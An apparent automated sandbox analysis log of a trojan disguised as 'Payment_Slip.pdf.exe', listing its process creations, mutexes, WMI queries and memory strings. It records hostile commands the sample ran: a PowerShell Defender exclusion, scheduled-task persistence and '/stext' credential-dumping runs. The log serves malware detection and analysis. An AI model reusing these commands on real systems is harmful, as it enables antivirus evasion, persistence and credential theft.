                              Source: host.exe.5.dr, N.csCryptographic APIs: 'TransformFinalBlock'
                              Source: host.exe.5.dr, N.csCryptographic APIs: 'TransformFinalBlock'
                              Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, B6t4opnIAo1QtrxVaa.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                              Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, B6t4opnIAo1QtrxVaa.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                              Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, TkYyY8ejXRydhTtm3i.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                              Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, TkYyY8ejXRydhTtm3i.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                              Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, TkYyY8ejXRydhTtm3i.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                              Source: classification engineClassification label: mal100.rans.phis.troj.spyw.evad.winEXE@33/34@6/7
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeCode function: 14_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,14_2_004182CE
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeCode function: 11_2_00415C90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,11_2_00415C90
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeCode function: 16_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle,16_2_00410DE1
                              Source: C:\Users\user\AppData\Local\Temp\dwn.exeCode function: 17_2_00415C90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,17_2_00415C90
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeCode function: 14_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,14_2_00418758
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeCode function: 11_2_0040E2E7 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,CloseHandle,11_2_0040E2E7
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeCode function: 11_2_00419493 FindResourceA,LoadResource,LockResource,SizeofResource,11_2_00419493
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeCode function: 11_2_00418A00 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,11_2_00418A00
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeFile created: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeJump to behavior
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeMutant created: NULL
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7276:120:WilError_03
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-TWFFFD
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5936:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8188:120:WilError_03
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeMutant created: \Sessions\1\BaseNamedObjects\dEEtDNIXGrGLJw
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeFile created: C:\Users\user\AppData\Local\Temp\tmp2819.tmpJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\dwn.exeCommand line argument: Software\17_2_0040D3F0
                              Source: C:\Users\user\AppData\Local\Temp\dwn.exeCommand line argument: 0"G17_2_0040D3F0
                              Source: C:\Users\user\AppData\Local\Temp\dwn.exeCommand line argument: Exe17_2_0040D3F0
                              Source: C:\Users\user\AppData\Local\Temp\dwn.exeCommand line argument: 0"G17_2_0040D3F0
                              Source: C:\Users\user\AppData\Local\Temp\dwn.exeCommand line argument: (#G17_2_0040D3F0
                              Source: C:\Users\user\AppData\Local\Temp\dwn.exeCommand line argument: Inj17_2_0040D3F0
                              Source: C:\Users\user\AppData\Local\Temp\dwn.exeCommand line argument: Inj17_2_0040D3F0
                              Source: C:\Users\user\AppData\Local\Temp\dwn.exeCommand line argument: Inj17_2_0040D3F0
                              Source: C:\Users\user\AppData\Local\Temp\dwn.exeCommand line argument: 0"G17_2_0040D3F0
                              Source: C:\Users\user\AppData\Local\Temp\dwn.exeCommand line argument: origmsc17_2_0040D3F0
                              Source: C:\Users\user\AppData\Local\Temp\dwn.exeCommand line argument: !G17_2_0040D3F0
                              Source: C:\Users\user\AppData\Local\Temp\dwn.exeCommand line argument: !G17_2_0040D3F0
                              Source: C:\Users\user\AppData\Local\Temp\dwn.exeCommand line argument: !G17_2_0040D3F0
                              Source: C:\Users\user\AppData\Local\Temp\dwn.exeCommand line argument: H"G17_2_0040D3F0
                              Source: C:\Users\user\AppData\Local\Temp\dwn.exeCommand line argument: !G17_2_0040D3F0
                              Source: C:\Users\user\AppData\Local\Temp\dwn.exeCommand line argument: exepath17_2_0040D3F0
                              Source: C:\Users\user\AppData\Local\Temp\dwn.exeCommand line argument: H"G17_2_0040D3F0
                              Source: C:\Users\user\AppData\Local\Temp\dwn.exeCommand line argument: exepath17_2_0040D3F0
                              Source: C:\Users\user\AppData\Local\Temp\dwn.exeCommand line argument: !G17_2_0040D3F0
                              Source: C:\Users\user\AppData\Local\Temp\dwn.exeCommand line argument: licence17_2_0040D3F0
                              Source: C:\Users\user\AppData\Local\Temp\dwn.exeCommand line argument: `"G17_2_0040D3F0
                              Source: C:\Users\user\AppData\Local\Temp\dwn.exeCommand line argument: Administrator17_2_0040D3F0
                              Source: C:\Users\user\AppData\Local\Temp\dwn.exeCommand line argument: User17_2_0040D3F0
                              Source: Payment_Slip.pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: Payment_Slip.pdf.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeSystem information queried: HandleInformation
                              Source: C:\Users\user\AppData\Roaming\host.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                              Source: C:\Users\user\AppData\Roaming\host.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\AppData\Roaming\host.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\AppData\Roaming\host.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\AppData\Roaming\host.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\AppData\Roaming\host.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\AppData\Roaming\host.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                              Source: Payment_Slip.pdf.exe, Payment_Slip.pdf.exe, 0000000E.00000002.1241566515.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                              Source: Payment_Slip.pdf.exe, Payment_Slip.pdf.exe, 0000000F.00000002.1222989805.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                              Source: Payment_Slip.pdf.exe, 0000000E.00000002.1241566515.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                              Source: Payment_Slip.pdf.exe, Payment_Slip.pdf.exe, 0000000E.00000002.1241566515.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                              Source: Payment_Slip.pdf.exe, Payment_Slip.pdf.exe, 0000000E.00000002.1241566515.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                              Source: Payment_Slip.pdf.exe, Payment_Slip.pdf.exe, 0000000E.00000002.1241566515.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                              Source: conserver.exe, 0000000D.00000002.3619471195.00000000030A9000.00000004.00000800.00020000.00000000.sdmp, Payment_Slip.pdf.exe, 0000000E.00000002.1244293689.0000000003098000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1539307669.00000000032D9000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002AB5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                              Source: Payment_Slip.pdf.exe, Payment_Slip.pdf.exe, 0000000E.00000002.1241566515.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                              Source: Payment_Slip.pdf.exeVirustotal: Detection: 45%
                              Source: Payment_Slip.pdf.exeReversingLabs: Detection: 50%
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeFile read: C:\Users\user\Desktop\Payment_Slip.pdf.exeJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeEvasive API call chain: __getmainargs,DecisionNodes,exit
                              Source: unknownProcess created: C:\Users\user\Desktop\Payment_Slip.pdf.exe "C:\Users\user\Desktop\Payment_Slip.pdf.exe"
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mHTmhPhJy.exe"
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mHTmhPhJy" /XML "C:\Users\user\AppData\Local\Temp\tmp2819.tmp"
                              Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeProcess created: C:\Users\user\Desktop\Payment_Slip.pdf.exe "C:\Users\user\Desktop\Payment_Slip.pdf.exe"
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                              Source: unknownProcess created: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe C:\Users\user\AppData\Roaming\mHTmhPhJy.exe
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mHTmhPhJy" /XML "C:\Users\user\AppData\Local\Temp\tmp36FE.tmp"
                              Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeProcess created: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe "C:\Users\user\AppData\Roaming\mHTmhPhJy.exe"
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeProcess created: C:\Users\user\AppData\Roaming\host.exe "C:\Users\user\AppData\Roaming\host.exe"
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeProcess created: C:\Users\user\AppData\Local\Temp\conserver.exe "C:\Users\user\AppData\Local\Temp\conserver.exe"
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeProcess created: C:\Users\user\Desktop\Payment_Slip.pdf.exe C:\Users\user\Desktop\Payment_Slip.pdf.exe /stext "C:\Users\user\AppData\Local\Temp\qticobshgwcqiiv"
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeProcess created: C:\Users\user\Desktop\Payment_Slip.pdf.exe C:\Users\user\Desktop\Payment_Slip.pdf.exe /stext "C:\Users\user\AppData\Local\Temp\snnvpudbueuusojfxn"
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeProcess created: C:\Users\user\Desktop\Payment_Slip.pdf.exe C:\Users\user\Desktop\Payment_Slip.pdf.exe /stext "C:\Users\user\AppData\Local\Temp\dpanqmncqmmhvvfjoxmrs"
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeProcess created: C:\Users\user\AppData\Local\Temp\dwn.exe "C:\Users\user\AppData\Local\Temp\dwn.exe"
                              Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe "C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe"
                              Source: unknownProcess created: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe "C:\Users\user\AppData\Roaming\mykksg\mykksg.exe"
                              Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe "C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe"
                              Source: unknownProcess created: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe "C:\Users\user\AppData\Roaming\mykksg\mykksg.exe"
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mHTmhPhJy.exe"Jump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mHTmhPhJy" /XML "C:\Users\user\AppData\Local\Temp\tmp2819.tmp"Jump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeProcess created: C:\Users\user\Desktop\Payment_Slip.pdf.exe "C:\Users\user\Desktop\Payment_Slip.pdf.exe"Jump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeProcess created: C:\Users\user\AppData\Roaming\host.exe "C:\Users\user\AppData\Roaming\host.exe" Jump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeProcess created: C:\Users\user\AppData\Local\Temp\conserver.exe "C:\Users\user\AppData\Local\Temp\conserver.exe" Jump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeProcess created: C:\Users\user\Desktop\Payment_Slip.pdf.exe C:\Users\user\Desktop\Payment_Slip.pdf.exe /stext "C:\Users\user\AppData\Local\Temp\qticobshgwcqiiv"Jump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeProcess created: C:\Users\user\Desktop\Payment_Slip.pdf.exe C:\Users\user\Desktop\Payment_Slip.pdf.exe /stext "C:\Users\user\AppData\Local\Temp\snnvpudbueuusojfxn"Jump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeProcess created: C:\Users\user\Desktop\Payment_Slip.pdf.exe C:\Users\user\Desktop\Payment_Slip.pdf.exe /stext "C:\Users\user\AppData\Local\Temp\dpanqmncqmmhvvfjoxmrs"Jump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeProcess created: C:\Users\user\AppData\Local\Temp\dwn.exe "C:\Users\user\AppData\Local\Temp\dwn.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mHTmhPhJy" /XML "C:\Users\user\AppData\Local\Temp\tmp36FE.tmp"Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeProcess created: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe "C:\Users\user\AppData\Roaming\mHTmhPhJy.exe"Jump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeSection loaded: version.dllJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeSection loaded: dwrite.dllJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeSection loaded: textshaping.dllJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeSection loaded: riched20.dllJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeSection loaded: usp10.dllJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeSection loaded: msls31.dllJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeSection loaded: windowscodecs.dllJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeSection loaded: iconcodecservice.dllJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeSection loaded: edputil.dllJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeSection loaded: appresolver.dllJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeSection loaded: bcp47langs.dllJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeSection loaded: slc.dllJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeSection loaded: sppc.dllJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
